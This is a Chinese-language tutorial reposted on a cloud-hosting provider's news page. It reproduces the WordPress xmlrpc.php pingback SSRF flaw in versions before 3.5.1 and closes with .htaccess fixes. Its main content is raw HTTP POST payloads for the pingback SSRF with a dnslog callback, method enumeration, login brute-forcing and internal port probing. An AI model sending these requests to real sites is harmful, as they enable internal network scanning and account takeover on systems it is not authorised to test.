最新活动
全部产品
  • 最新活动区
  • 美国云服务器
  • 香港云服务器
  • 台湾云服务器
  • 海外物理机
美国最新活动
香港最新活动
美国高端一区
美国建站区
美国精品一区
美国站群
美国大带宽一区
香港轻量区
香港精品区
香港建站区
香港轻量区
台湾CN2 云服务器
美国物理机
网站资讯
渠道合作
解决方案
更多
登录
网站首页
    最新活动
      推广加盟 合作伙伴
      宝塔面板
      网站解决方案 金融解决方案 电商解决方案 移动解决方案 游戏解决方案
      公司简介 联系我们
      新闻公告使用手机扫一扫查看
      < 返回

      复现WordPress xmlrpc.php漏洞和SSRF的详细步骤

      2022-11-04 07:35 作者:老七云-运管002 阅读量:975 标签: 漏洞 WordPress xmlrpc.php SSRF

      一、漏洞介绍

      通过Pingback可以实现的服务器端请求伪造 (Server-side request forgery,SSRF)和远程端口扫描。

      二、漏洞影响

      WordPress 版本< 3.5.1

      造成的影响
      1、可以对业务内网进行探测。
      2、攻击运行在内网或本地的应用程序(比如溢出攻击)。
      3、利用file协议读取本地文件等

      三、漏洞复现

      第一步:直接访问这个文件,初步判断

      复现WordPress xmlrpc.php漏洞和SSRF的详细步骤

      第二步:发现POC验证数据包 

      ?

      1
      2
      3
      4
      5
      6
      7
      8
      9
      10
      11
      12
      13
      14
      15
      16
      17
      18
      POST /xmlrpc.php HTTP/1.1
      Host: www.目标.com
      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:82.0) Gecko/20100101 Firefox/82.0
      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
      Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
      Accept-Encoding: gzip, deflate
      Connection: close
      Upgrade-Insecure-Requests: 1
      Content-Length: 310
       
      <?xml version= "1.0" encoding= "iso-8859-1" ?>
           <methodCall>
           <methodName>pingback.ping</methodName>
           <params>
           <param><value><string>http: //g8o53x.dnslog.cn/</string></value></param>
           <param><value><string>http: //www.目标.com/?p=1</string></value></param>
           </params>
           </methodCall>

      发送数据包

      复现WordPress xmlrpc.php漏洞和SSRF的详细步骤

      验证成功 !

      复现WordPress xmlrpc.php漏洞和SSRF的详细步骤

      四、深入利用

      (一)查看系统允许的方法

      ?

      1
      2
      3
      4
      5
      6
      7
      8
      POST /wordpress/xmlrpc.php HTTP/1.1
      Host: www.example.com
      Content-Length: 99
      ......
      <methodCall>
      <methodName>system.listMethods</methodName>
      <params></params>
      </methodCall>

      复现WordPress xmlrpc.php漏洞和SSRF的详细步骤

       (二)账号爆破

      ?

      1
      2
      3
      4
      5
      6
      7
      8
      9
      10
      11
      POST /wordpress/xmlrpc.php HTTP/1.1
      Host: www.example.com
      Content-Length: 99
      ......
      <methodCall>
      <methodName>wp.getUsersBlogs</methodName>
      <params>
      <param><value>admin</value></param>
      <param><value>password</value></param>
      </params>
      </methodCall>

      (三)通过Pingback可以实现的服务器端请求伪造 (Server-side request forgery,SSRF)和远程端口扫描。

      ?

      1
      2
      3
      4
      5
      6
      7
      8
      9
      10
      11
      POST /wordpress/xmlrpc.php HTTP/1.1
      Host: www.example.com
      Content-Length: 99
      .......
      <methodCall>
      <methodName>pingback.ping</methodName>
      <params><param>
      <value><string>要探测的ip和端口:http: //127.0.0.1:80</string></value>
      </param><param><value><string>要探测的URL</string>
      </value></param></params>
      </methodCall>

      五、漏洞修复

      (一)通过APACHE的.htaccess屏蔽xmlrpc.php文件的访问。配置代码如下:

      ?

      1
      2
      3
      4
      5
      # protect xmlrpc
      <Files "xmlrpc.php" >
      Order Allow,Deny
      Deny from all
      </Files>

      (二)删除根目录下的xmlrpc.php。

      到此这篇关于复现WordPress xmlrpc.php漏洞和SSRF的文章就介绍到这了,更多相关WordPress漏洞复现内容请搜索老七云以前的文章或继续浏览下面的相关文章希望大家以后多多支持老七云!

      原文链接:https://blog.csdn.net/xiaofengdada/article/details/123911049

      联系我们
      返回顶部